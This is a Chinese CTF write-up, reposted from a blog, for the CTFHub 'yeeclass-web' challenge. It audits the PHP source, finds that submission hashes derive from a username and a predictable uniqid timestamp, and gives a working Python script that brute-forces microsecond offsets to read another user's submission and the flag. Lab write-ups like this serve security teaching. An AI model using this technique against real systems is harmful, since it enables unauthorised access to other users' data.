自学内容网 自学内容网

CTFHUB--yeeclass-web

复现平台CTFHUB
靶机为一个完整类论坛网页,题目给了服务端完整代码

代码审计

/src/submit.php Line56-63:

可以看到提交数据存入的时候将$_SESSION["username"]."_"作为前缀,生成了一个uniqid。uniqid的生成方式即{sec:08x}{usec:05x}

/src/submission.php Line5-15:

在该查询界面中首选了hash参数作为查询方式,
意味着如果获得存入数据库的时间username即可模拟出hash从而读取flag

/src/submission.php Line16-44:

允许了通过homeworkid查询入库时间username

解题

在没有登录没有session访问challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?homeworkid=1得到提交时间和username

而入库时间和uniqid由于运行效率,会存在微秒时间差,因而需要爆破该时间差

exp

import requests
import hashlib
from datetime import datetime, timezone

username = "flagholder"
timestamp = '2024-11-22 09:07:23.852319'

dt = datetime.fromisoformat(timestamp)  # .replace(tzinfo=timezone.utc)
sec = int(dt.timestamp())
usec = dt.microsecond
print(sec, usec)

url = 'http://challenge-1c52ef1ba40625fd.sandbox.ctfhub.com:10800/submission.php?hash='

def get_hash(sec, usec):
    user_id = f"{username}_{sec:08x}{usec:05x}"
    return hashlib.sha1(user_id.encode()).hexdigest()

for i in range(0, 1000):
    hash = get_hash(sec, usec - i)
    r = requests.get(url + hash)
    print(i, hash)
    if r.text != "Submission not found.":
        print("Found hash:", hash)
        print(r.text)
        break

拿到了ctfhub{376dd19de0bf76c22d544b30}


原文地址:https://blog.csdn.net/we_solo/article/details/143961941

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!